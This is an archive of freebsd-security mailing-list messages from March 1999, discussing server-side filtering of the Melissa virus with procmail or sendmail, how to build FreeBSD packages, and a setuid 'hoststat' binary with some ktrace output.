to configure > Sendmail to use procmail as the local delivery agent. > > This would be something that could be touted as an advantage of > using FreeBSD as a mail server. > > Of course, I'll probably be told that this is a bad idea because > Jordan didn't think of it. 
> > --Brett Glass > > > At 01:47 PM 3/29/99 -0800, patl@phoenix.volant.org wrote: > >> And mind you, the two of you may sit in your own private heavens, > >> but many of the rest of us work in the real world. This particular > >> outbreak seems to warrant the original email. > > > >If by 'the real world' you mean an environment where you need to > >worry about virii that infect Windows, M$ Word documents, Excell > >spreadsheets, etc.; then you should be subscribed to one or more > >lists dedicated to those topics. Let's keep this list FreeBSD > >specific, please. > > > > > > > >-Pat > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > >with "unsubscribe freebsd-security" in the body of the message > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 29 15:45:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 3790E14FD0 for ; Mon, 29 Mar 1999 15:45:18 -0800 (PST) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id QAA03094; Mon, 29 Mar 1999 16:44:53 -0700 (MST) Message-Id: <4.2.0.32.19990329164244.04553770@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.32 (Beta) Date: Mon, 29 Mar 1999 16:44:42 -0700 To: Igor Roshchin From: Brett Glass Subject: Re: Virus Announcements Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <199903292324.RAA07912@alecto.physics.uiuc.edu> References: <4.2.0.32.19990329155900.00a557c0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Sendmail's 
filtering is quite limited compared to that of Procmail. And the "quick fix" posted by Sendmail, Inc. is trivial to defeat. We've installed both, and the Procmail filters are catching lots more suspicious traffic. --Brett At 05:24 PM 3/29/99 -0600, Igor Roshchin wrote: >If you are talking about using FreeBSD to filter Melissa virus >(and some similar virus), you might consider tweaking the rulesets for >sendmail. > >I haven't tried installing that ruleset, >but the CERT advisory recommended: > > >III. Solutions > > * Block messages with the signature of this virus at your mail transfer > agents. > > With Sendmail > > Nick Christenson of sendmail.com provided information about > configuring sendmail to filter out messages that may contain the > Melissa virus. This information is available from the follow URL: > ftp://ftp.cert.org/pub/cert_advisories/Patches/CA-99-04-sendmail-m > elissa-filter.txt > > >Since sendmail is the default MTA in FreeBSD, this might be more universal >to the general public (compared to procmail's rules/patches). > >IgoR > > >PS. I agree that this list should contain only FreeBSD-related >(or potentially related) issues. >Other issues are important, but there are other lists for them - >e.g. BUGTRAQ .. > >> OK, here's something FreeBSD-specific we ought to do. Let's make >> up a FreeBSD package that installs John Hardin's e-mail sanitizing >> filters with some sane default settings that kill the Melissa virus. >> >> John's filters can be found at >> >> ftp://ftp.rubyriver.com/pub/jhardin/antispam/procmail-kit.html >> >> All we need to do is tweak the paths for FreeBSD, bring in >> procmail as a dependency, and tell the user how to configure >> Sendmail to use procmail as the local delivery agent. >> >> This would be something that could be touted as an advantage of >> using FreeBSD as a mail server. >> >> Of course, I'll probably be told that this is a bad idea because >> Jordan didn't think of it. 
>> >> --Brett Glass >> >> >> At 01:47 PM 3/29/99 -0800, patl@phoenix.volant.org wrote: >> >> And mind you, the two of you may sit in your own private heavens, >> >> but many of the rest of us work in the real world. This particular >> >> outbreak seems to warrant the original email. >> > >> >If by 'the real world' you mean an environment where you need to >> >worry about virii that infect Windows, M$ Word documents, Excell >> >spreadsheets, etc.; then you should be subscribed to one or more >> >lists dedicated to those topics. Let's keep this list FreeBSD >> >specific, please. >> > >> > >> > >> >-Pat >> > >> > >> >To Unsubscribe: send mail to majordomo@FreeBSD.org >> >with "unsubscribe freebsd-security" in the body of the message >> >> >> >> To Unsubscribe: send mail to majordomo@FreeBSD.org >> with "unsubscribe freebsd-security" in the body of the message >> To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 29 15:59:43 1999 Delivered-To: freebsd-security@freebsd.org Received: from axl.noc.iafrica.com (axl.noc.iafrica.com [196.31.1.175]) by hub.freebsd.org (Postfix) with ESMTP id 09C7814C4F for ; Mon, 29 Mar 1999 15:59:34 -0800 (PST) (envelope-from sheldonh@axl.noc.iafrica.com) Received: from sheldonh (helo=axl.noc.iafrica.com) by axl.noc.iafrica.com with local-esmtp (Exim 2.12 #1) id 10RlsH-0000Mz-00; Tue, 30 Mar 1999 01:55:21 +0200 From: Sheldon Hearn To: Brett Glass Cc: patl@phoenix.volant.org, Poul-Henning Kamp , "Theo Purmer (Tepucom)" , "'freebsd-security@FreeBSD.ORG'" Subject: Re: Virus Announcements In-reply-to: Your message of "Mon, 29 Mar 1999 16:03:00 MST." 
<4.2.0.32.19990329155900.00a557c0@localhost> Date: Tue, 30 Mar 1999 01:55:21 +0200 Message-ID: <1424.922751721@axl.noc.iafrica.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 29 Mar 1999 16:03:00 MST, Brett Glass wrote: > Of course, I'll probably be told that this is a bad idea because > Jordan didn't think of it. It's a bad idea because the people throwing ideas around are speaking English and not diff(1). Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 29 16:47: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 1950A14ED0 for ; Mon, 29 Mar 1999 16:46:59 -0800 (PST) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id RAA03671; Mon, 29 Mar 1999 17:43:05 -0700 (MST) Message-Id: <4.2.0.32.19990329174138.00cc2f00@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.32 (Beta) Date: Mon, 29 Mar 1999 17:43:01 -0700 To: Sheldon Hearn From: Brett Glass Subject: Re: Virus Announcements Cc: patl@phoenix.volant.org, Poul-Henning Kamp , "Theo Purmer (Tepucom)" , "'freebsd-security@FreeBSD.ORG'" In-Reply-To: <1424.922751721@axl.noc.iafrica.com> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Sorry, you can't do it in diff(1), because it has to be created ex nihilo. Oh, and there are no docs on how to do it; the man pages for pkg_add and pkg_info are (characteristically) mute on how to MAKE a package. 
--Brett At 01:55 AM 3/30/99 +0200, Sheldon Hearn wrote: >On Mon, 29 Mar 1999 16:03:00 MST, Brett Glass wrote: > >> Of course, I'll probably be told that this is a bad idea because >> Jordan didn't think of it. > >It's a bad idea because the people throwing ideas around are speaking >English and not diff(1). > >Ciao, >Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 29 16:49:14 1999 Delivered-To: freebsd-security@freebsd.org Received: from sawasdee.cc.columbia.edu (sawasdee.cc.columbia.edu [128.59.59.136]) by hub.freebsd.org (Postfix) with ESMTP id E710F14D8F for ; Mon, 29 Mar 1999 16:49:10 -0800 (PST) (envelope-from stuyman@confusion.net) Received: from confusion.net (dialup-1-80.cc.columbia.edu [128.59.42.89]) by sawasdee.cc.columbia.edu (8.8.5/8.8.5) with ESMTP id TAA20615; Mon, 29 Mar 1999 19:48:40 -0500 (EST) Message-ID: <37001F1B.C2B92D74@confusion.net> Date: Mon, 29 Mar 1999 19:47:23 -0500 From: Laurence Berland Organization: B.R.A.T.T. X-Mailer: Mozilla 4.5 [en] (Win95; U) X-Accept-Language: en MIME-Version: 1.0 To: Brett Glass , security@freebsd.org Subject: Re: Virus Announcements References: <4.2.0.32.19990329155900.00a557c0@localhost> <4.2.0.32.19990329164244.04553770@localhost> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Just read something about Melissa on ZDNet, scanning it to see if it's dumbed down enough to be read by my computer-illiterate parents. And what do I see at the bottom? That Brett Glass contributed to the article. That makes me happy. I'm glad to see that people from BSD help out windows users, as silly as they may be. Congrats Brett. Brett Glass wrote: > Sendmail's filtering is quite limited compared to that of Procmail. And > the "quick fix" posted by Sendmail, Inc. is trivial to defeat. 
We've > installed both, and the Procmail filters are catching lots more suspicious > traffic. > > --Brett > > At 05:24 PM 3/29/99 -0600, Igor Roshchin wrote: > >If you are talking about using FreeBSD to filter Melissa virus > >(and some similar virus), you might consider tweaking the rulesets for > >sendmail. > > > >I haven't tried installing that ruleset, > >but the CERT advisory recommended: > > > > > >III. Solutions > > > > * Block messages with the signature of this virus at your mail transfer > > agents. > > > > With Sendmail > > > > Nick Christenson of sendmail.com provided information about > > configuring sendmail to filter out messages that may contain the > > Melissa virus. This information is available from the follow URL: > > ftp://ftp.cert.org/pub/cert_advisories/Patches/CA-99-04-sendmail-m > > elissa-filter.txt > > > > > >Since sendmail is the default MTA in FreeBSD, this might be more universal > >to the general public (compared to procmail's rules/patches). > > > >IgoR > > > > > >PS. I agree that this list should contain only FreeBSD-related > >(or potentially related) issues. > >Other issues are important, but there are other lists for them - > >e.g. BUGTRAQ .. > > > >> OK, here's something FreeBSD-specific we ought to do. Let's make > >> up a FreeBSD package that installs John Hardin's e-mail sanitizing > >> filters with some sane default settings that kill the Melissa virus. > >> > >> John's filters can be found at > >> > >> ftp://ftp.rubyriver.com/pub/jhardin/antispam/procmail-kit.html > >> > >> All we need to do is tweak the paths for FreeBSD, bring in > >> procmail as a dependency, and tell the user how to configure > >> Sendmail to use procmail as the local delivery agent. > >> > >> This would be something that could be touted as an advantage of > >> using FreeBSD as a mail server. > >> > >> Of course, I'll probably be told that this is a bad idea because > >> Jordan didn't think of it. 
> >> > >> --Brett Glass > >> > >> > >> At 01:47 PM 3/29/99 -0800, patl@phoenix.volant.org wrote: > >> >> And mind you, the two of you may sit in your own private heavens, > >> >> but many of the rest of us work in the real world. This particular > >> >> outbreak seems to warrant the original email. > >> > > >> >If by 'the real world' you mean an environment where you need to > >> >worry about virii that infect Windows, M$ Word documents, Excell > >> >spreadsheets, etc.; then you should be subscribed to one or more > >> >lists dedicated to those topics. Let's keep this list FreeBSD > >> >specific, please. > >> > > >> > > >> > > >> >-Pat > >> > > >> > > >> >To Unsubscribe: send mail to majordomo@FreeBSD.org > >> >with "unsubscribe freebsd-security" in the body of the message > >> > >> > >> > >> To Unsubscribe: send mail to majordomo@FreeBSD.org > >> with "unsubscribe freebsd-security" in the body of the message > >> > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Laurence Berland, Stuyvesant HS Debate <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> Windows 98: n. useless extension to a minor patch release for 32-bit extensions and a graphical shell for a 16-bit patch to an 8-bit operating system originally coded for a 4-bit microprocessor, written by a 2-bit company that can't stand for 1 bit of competition. 
http://stuy.debate.net icq #7434346 aol imer E1101 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 29 16:54:16 1999 Delivered-To: freebsd-security@freebsd.org Received: from axl.noc.iafrica.com (axl.noc.iafrica.com [196.31.1.175]) by hub.freebsd.org (Postfix) with ESMTP id ADDF414C48 for ; Mon, 29 Mar 1999 16:53:49 -0800 (PST) (envelope-from sheldonh@axl.noc.iafrica.com) Received: from sheldonh (helo=axl.noc.iafrica.com) by axl.noc.iafrica.com with local-esmtp (Exim 2.12 #1) id 10Rmls-0000YS-00; Tue, 30 Mar 1999 02:52:48 +0200 From: Sheldon Hearn To: Brett Glass Cc: patl@phoenix.volant.org, Poul-Henning Kamp , "Theo Purmer (Tepucom)" , "'freebsd-security@FreeBSD.ORG'" Subject: Re: Virus Announcements In-reply-to: Your message of "Mon, 29 Mar 1999 17:43:01 MST." <4.2.0.32.19990329174138.00cc2f00@localhost> Date: Tue, 30 Mar 1999 02:52:47 +0200 Message-ID: <2135.922755167@axl.noc.iafrica.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 29 Mar 1999 17:43:01 MST, Brett Glass wrote: > Sorry, you can't do it in diff(1), because it has to be created ex > nihilo. Diff(1)'s -N option is useful for ex nihilo creations. Anyway, the point is that this is _another_ thread going nowhere, driven by several folks (who care but can't) saying "you should" to people who can but don't care. You've been around long enough to know where that goes... > Oh, and there are no docs on how to do it; the man pages for pkg_add > and pkg_info are (characteristically) mute on how to MAKE a package. This is a _particularly_ lame comment, indicative of the nature of this whole thread. See pkg_create(1) and be amazed. :-) Ciao, Sheldon. 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 29 17: 2:10 1999 Delivered-To: freebsd-security@freebsd.org Received: from cs.bc.edu (cs.bc.edu [136.167.32.100]) by hub.freebsd.org (Postfix) with ESMTP id 9F9B114C48 for ; Mon, 29 Mar 1999 17:01:58 -0800 (PST) (envelope-from kelleyry@cs.bc.edu) Received: from localhost (kelleyry@localhost) by cs.bc.edu (8.8.6/8.8.6) with ESMTP id TAA19262; Mon, 29 Mar 1999 19:57:37 -0500 (EST) Date: Mon, 29 Mar 1999 19:57:37 -0500 (EST) From: Ryan Kelley To: Brett Glass Cc: Sheldon Hearn , patl@phoenix.volant.org, Poul-Henning Kamp , "Theo Purmer (Tepucom)" , "'freebsd-security@FreeBSD.ORG'" Subject: Re: Virus Announcements In-Reply-To: <4.2.0.32.19990329174138.00cc2f00@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org check out man pkg_create. -r --------- Ryan Kelley kelleyry@cs.bc.edu "tried to endure what i could not forgive..." - pearl jam On Mon, 29 Mar 1999, Brett Glass wrote: > Sorry, you can't do it in diff(1), because it has to be created ex > nihilo. Oh, and there are no docs on how to do it; the man pages > for pkg_add and pkg_info are (characteristically) mute on how > to MAKE a package. > > --Brett > > At 01:55 AM 3/30/99 +0200, Sheldon Hearn wrote: > > > >On Mon, 29 Mar 1999 16:03:00 MST, Brett Glass wrote: > > > >> Of course, I'll probably be told that this is a bad idea because > >> Jordan didn't think of it. > > > >It's a bad idea because the people throwing ideas around are speaking > >English and not diff(1). > > > >Ciao, > >Sheldon. 
> > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 29 17:10:23 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 9941214C9D for ; Mon, 29 Mar 1999 17:10:22 -0800 (PST) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id SAA03919; Mon, 29 Mar 1999 18:09:54 -0700 (MST) Message-Id: <4.2.0.32.19990329175542.00c88430@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.32 (Beta) Date: Mon, 29 Mar 1999 18:09:45 -0700 To: Laurence Berland , security@freebsd.org From: Brett Glass Subject: Re: Virus Announcements In-Reply-To: <37001F1B.C2B92D74@confusion.net> References: <4.2.0.32.19990329155900.00a557c0@localhost> <4.2.0.32.19990329164244.04553770@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Most of my day is spent helping Windows users. Most would be totally lost if confronted with a shell prompt. In fact, the majority do not even know the names of the user interface elements they manipulate on their screens. ("Do you see a dialogue box in front of you?" "No, there's a window there, but my computer isn't saying anything.") One of the way I help those users is to keep the UNIX server in the back room running smoothly. If they're going to be running a seriously buggy and crash-prone desktop OS, the mission critical data and functionality needs to stay on a reliable server. 
I was probably one of the first few people to analyze the Melissa virus, characterize its behavior, and specify filters for it. The best server-side filter I've seen so far is the one I asked John Hardin to add to his procmail security scripts. It won't catch every conceivable variation, but it's a good first line of defense. You can then install virus checkers, get rid of Microsoft Word and Excel, and install Corel Wordperfect Office. Alas, there's no native version of WP Office for FreeBSD. In the meantime, who here knows the arcana of how to build a package? I've looked at the innards of a couple of tarballs but have no idea how to specify dependencies, pop up a message to tell the user what to do next, test for the right version of Perl (you need Perl5 and some FreeBSD users have Perl4), etc. There don't seem to be any docs. --Brett -- At 07:47 PM 3/29/99 -0500, Laurence Berland wrote: >Just read something about Melissa on ZDNet, scanning it to see if it's dumbed >down enough to be read by my computer-illiterate parents. And what do I see at >the bottom? That Brett Glass contributed to the article. That makes me happy. >I'm glad to see that people from BSD help out windows users, as silly as they may >be. Congrats Brett. > >Brett Glass wrote: > >> Sendmail's filtering is quite limited compared to that of Procmail. And >> the "quick fix" posted by Sendmail, Inc. is trivial to defeat. We've >> installed both, and the Procmail filters are catching lots more suspicious >> traffic. >> >> --Brett >> >> At 05:24 PM 3/29/99 -0600, Igor Roshchin wrote: >> >If you are talking about using FreeBSD to filter Melissa virus >> >(and some similar virus), you might consider tweaking the rulesets for >> >sendmail. >> > >> >I haven't tried installing that ruleset, >> >but the CERT advisory recommended: >> > >> > >> >III. Solutions >> > >> > * Block messages with the signature of this virus at your mail transfer >> > agents. 
>> > >> > With Sendmail >> > >> > Nick Christenson of sendmail.com provided information about >> > configuring sendmail to filter out messages that may contain the >> > Melissa virus. This information is available from the follow URL: >> > ftp://ftp.cert.org/pub/cert_advisories/Patches/CA-99-04-sendmail-m >> > elissa-filter.txt >> > >> > >> >Since sendmail is the default MTA in FreeBSD, this might be more universal >> >to the general public (compared to procmail's rules/patches). >> > >> >IgoR >> > >> > >> >PS. I agree that this list should contain only FreeBSD-related >> >(or potentially related) issues. >> >Other issues are important, but there are other lists for them - >> >e.g. BUGTRAQ .. >> > >> >> OK, here's something FreeBSD-specific we ought to do. Let's make >> >> up a FreeBSD package that installs John Hardin's e-mail sanitizing >> >> filters with some sane default settings that kill the Melissa virus. >> >> >> >> John's filters can be found at >> >> >> >> ftp://ftp.rubyriver.com/pub/jhardin/antispam/procmail-kit.html >> >> >> >> All we need to do is tweak the paths for FreeBSD, bring in >> >> procmail as a dependency, and tell the user how to configure >> >> Sendmail to use procmail as the local delivery agent. >> >> >> >> This would be something that could be touted as an advantage of >> >> using FreeBSD as a mail server. >> >> >> >> Of course, I'll probably be told that this is a bad idea because >> >> Jordan didn't think of it. >> >> >> >> --Brett Glass >> >> >> >> >> >> At 01:47 PM 3/29/99 -0800, patl@phoenix.volant.org wrote: >> >> >> And mind you, the two of you may sit in your own private heavens, >> >> >> but many of the rest of us work in the real world. This particular >> >> >> outbreak seems to warrant the original email. 
>> >> > >> >> >If by 'the real world' you mean an environment where you need to >> >> >worry about virii that infect Windows, M$ Word documents, Excell >> >> >spreadsheets, etc.; then you should be subscribed to one or more >> >> >lists dedicated to those topics. Let's keep this list FreeBSD >> >> >specific, please. >> >> > >> >> > >> >> > >> >> >-Pat >> >> > >> >> > >> >> >To Unsubscribe: send mail to majordomo@FreeBSD.org >> >> >with "unsubscribe freebsd-security" in the body of the message >> >> >> >> >> >> >> >> To Unsubscribe: send mail to majordomo@FreeBSD.org >> >> with "unsubscribe freebsd-security" in the body of the message >> >> >> >> To Unsubscribe: send mail to majordomo@FreeBSD.org >> with "unsubscribe freebsd-security" in the body of the message > >-- >Laurence Berland, Stuyvesant HS Debate ><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> >Windows 98: n. > useless extension to a minor patch release for > 32-bit extensions and a graphical shell for a > 16-bit patch to an 8-bit operating system > originally coded for a 4-bit microprocessor, > written by a 2-bit company that can't stand for > 1 bit of competition. 
>http://stuy.debate.net >icq #7434346 aol imer E1101 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 29 21:54:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from phk.freebsd.dk (phk.freebsd.dk [212.242.40.153]) by hub.freebsd.org (Postfix) with ESMTP id 11CFB158F1 for ; Mon, 29 Mar 1999 21:54:18 -0800 (PST) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by phk.freebsd.dk (8.9.1/8.8.8) with ESMTP id HAA07988; Tue, 30 Mar 1999 07:53:58 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.2/8.9.2) with ESMTP id HAA22580; Tue, 30 Mar 1999 07:53:53 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: patl@phoenix.volant.org Cc: "Theo Purmer (Tepucom)" , "'freebsd-security@FreeBSD.ORG'" Subject: Re: Virus Announcements In-reply-to: Your message of "Mon, 29 Mar 1999 13:47:41 -0800." Date: Tue, 30 Mar 1999 07:53:52 +0200 Message-ID: <22578.922773232@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message , patl@phoenix.volant.org writes: >> And mind you, the two of you may sit in your own private heavens, >> but many of the rest of us work in the real world. This particular >> outbreak seems to warrant the original email. > >If by 'the real world' you mean an environment where you need to >worry about virii that infect Windows, M$ Word documents, Excell >spreadsheets, etc.; then you should be subscribed to one or more >lists dedicated to those topics. Let's keep this list FreeBSD >specific, please. By 'the real world' I mean the one where people are not fanatic minimalists, and where the exception to the rule is recognized as what defines the shape of the rule. 
-- 
Poul-Henning Kamp             FreeBSD coreteam member
phk@FreeBSD.ORG               "Real hackers run -current on their laptop."
FreeBSD -- It will take a long time before progress goes too far!

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Mar 29 22: 4:26 1999
Delivered-To: freebsd-security@freebsd.org
Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 7D1A11594E for ; Mon, 29 Mar 1999 22:04:23 -0800 (PST) (envelope-from brett@lariat.org)
Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id XAA06389; Mon, 29 Mar 1999 23:00:38 -0700 (MST)
Message-Id: <4.2.0.32.19990329225803.00a86c70@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.32 (Beta)
Date: Mon, 29 Mar 1999 22:59:00 -0700
To: Poul-Henning Kamp , patl@phoenix.volant.org
From: Brett Glass
Subject: Re: Virus Announcements
Cc: "Theo Purmer (Tepucom)" , "'freebsd-security@FreeBSD.ORG'"
In-Reply-To: <22578.922773232@critter.freebsd.dk>
References:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

At 07:53 AM 3/30/99 +0200, Poul-Henning Kamp wrote:

>By 'the real world' I mean the one where people are not fanatic
>minimalists, and where the exception to the rule is recognized as
>what defines the shape of the rule.

In the real world, none of us can avoid having to deal with Windows.
In many cases, it's the reason why our UNIX skills are so valuable.

--Brett

From owner-freebsd-security Mon Mar 29 23: 2:51 1999
Received: from smtp2.andrew.cmu.edu (SMTP2.ANDREW.CMU.EDU [128.2.10.82]) by hub.freebsd.org (Postfix) with ESMTP id 15D1314D29 for ; Mon, 29 Mar 1999 23:02:45 -0800 (PST) (envelope-from Harry_M_Leitzell@cmu.edu)
Received: from unix8.andrew.cmu.edu (UNIX8.ANDREW.CMU.EDU [128.2.15.12]) by smtp2.andrew.cmu.edu (8.8.5/8.8.2) with SMTP id CAA00561 for ; Tue, 30 Mar 1999 02:02:25 -0500 (EST)
Date: Tue, 30 Mar 1999 02:02:24 -0500 (EST)
From: "Harry M. Leitzell"
X-Sender: Harry_M_Leitzell@unix8.andrew.cmu.edu
To: freebsd-security@freebsd.org
Subject: Curious about 'hoststat'
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

Well, I am going through a FreeBSD machine and removing the suid bits on
programs that have no purpose having them for a simple user host machine.
Going through /var/log/setuid.today and changing the permissions on the
programs seems like a good idea until I got to 'hoststat'.

-r-sr-xr-x 5 root wheel 290016 Feb 15 05:45:23 1999 /usr/bin/hoststat

I usually go through the man pages for a program that has a suid bit by
default to make sure no user actually could have a use for it. Only this
doesn't have a man page. A keyword search turns up nothing. Running it
does seemingly nothing. It intrigues me that a program could be suid 0 by
default and not have any documentation on it. While the experienced person
might just CVS the source, deduce the meaning of it from the code, some of
us don't have the experience or time to do so. I was just thinking if there
isn't sufficient documentation on the program, should it be installed
suid 0 by default?

[-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-]
Harry M. Leitzell - Harry_M_Leitzell@cmu.edu
Carnegie Mellon University
Finger for PGP Public Key
[-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-]

From owner-freebsd-security Mon Mar 29 23: 4: 5 1999
Received: from phk.freebsd.dk (phk.freebsd.dk [212.242.40.153]) by hub.freebsd.org (Postfix) with ESMTP id E881114D29 for ; Mon, 29 Mar 1999 23:03:46 -0800 (PST) (envelope-from phk@critter.freebsd.dk)
Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by phk.freebsd.dk (8.9.1/8.8.8) with ESMTP id JAA08291; Tue, 30 Mar 1999 09:03:23 +0200 (CEST) (envelope-from phk@critter.freebsd.dk)
Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.2/8.9.2) with ESMTP id JAA22993; Tue, 30 Mar 1999 09:03:12 +0200 (CEST) (envelope-from phk@critter.freebsd.dk)
To: Brett Glass
Cc: patl@phoenix.volant.org, "Theo Purmer (Tepucom)" , "'freebsd-security@FreeBSD.ORG'"
Subject: Re: Virus Announcements
In-reply-to: Your message of "Mon, 29 Mar 1999 22:59:00 PDT." <4.2.0.32.19990329225803.00a86c70@localhost>
Date: Tue, 30 Mar 1999 09:03:12 +0200
Message-ID: <22991.922777392@critter.freebsd.dk>
From: Poul-Henning Kamp

In message <4.2.0.32.19990329225803.00a86c70@localhost>, Brett Glass writes:
>At 07:53 AM 3/30/99 +0200, Poul-Henning Kamp wrote:
>
>>By 'the real world' I mean the one where people are not fanatic
>>minimalists, and where the exception to the rule is recognized as
>>what defines the shape of the rule.
>
>In the real world, none of us can avoid having to deal with Windows.
>In many cases, it's the reason why our UNIX skills are so valuable.

amen!

-- 
Poul-Henning Kamp             FreeBSD coreteam member
phk@FreeBSD.ORG               "Real hackers run -current on their laptop."
FreeBSD -- It will take a long time before progress goes too far!

From owner-freebsd-security Mon Mar 29 23:24:45 1999
Received: from shell.futuresouth.com (shell.futuresouth.com [198.78.58.28]) by hub.freebsd.org (Postfix) with ESMTP id 45C9C14D29 for ; Mon, 29 Mar 1999 23:24:44 -0800 (PST) (envelope-from fullermd@futuresouth.com)
Received: (from fullermd@localhost) by shell.futuresouth.com (8.9.3/8.9.3) id BAA10184; Tue, 30 Mar 1999 01:24:22 -0600 (CST)
Date: Tue, 30 Mar 1999 01:24:22 -0600
From: "Matthew D. Fuller"
To: "Harry M. Leitzell"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Curious about 'hoststat'
Message-ID: <19990330012422.Z17547@futuresouth.com>
References:
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.95.3i
In-Reply-To: ; from Harry M. Leitzell on Tue, Mar 30, 1999 at 02:02:24AM -0500
X-OS: FreeBSD

On Tue, Mar 30, 1999 at 02:02:24AM -0500, a little birdie told me
that Harry M. Leitzell remarked
> Well, I am going through a FreeBSD machine and removing the suid
> bits on programs that have no purpose having them for a simple user host
> machine. Going through /var/log/setuid.today and changing the permissions
> on the programs seems like a good idea until I got to 'hoststat'.
> 
> -r-sr-xr-x 5 root wheel 290016 Feb 15 05:45:23 1999 /usr/bin/hoststat

I'm too asleep to look at CVS logs, but here's food for thought:

1) From strings-ing it, it looks like part of sendmail

2)
[1:21:57] mortis:~ (ttyp5):{2417}% ktrace hoststat
[1:22:13] mortis:~ (ttyp5):{2418}% page kdump < ktrace.out
 19217 ktrace   RET   ktrace 0
 19217 ktrace   CALL  readlink(0x200709a2,0xefbfd2c0,0x3f)
 19217 ktrace   NAMI  "/etc/malloc.conf"
 19217 ktrace   RET   readlink -1 errno 2 No such file or directory
 19217 ktrace   CALL  mmap(0,0x1000,0x3,0x1002,0xffffffff,0,0,0)
 19217 ktrace   RET   mmap 536985600/0x2001c000
 19217 ktrace   CALL  break(0x5000)
 19217 ktrace   RET   break 0
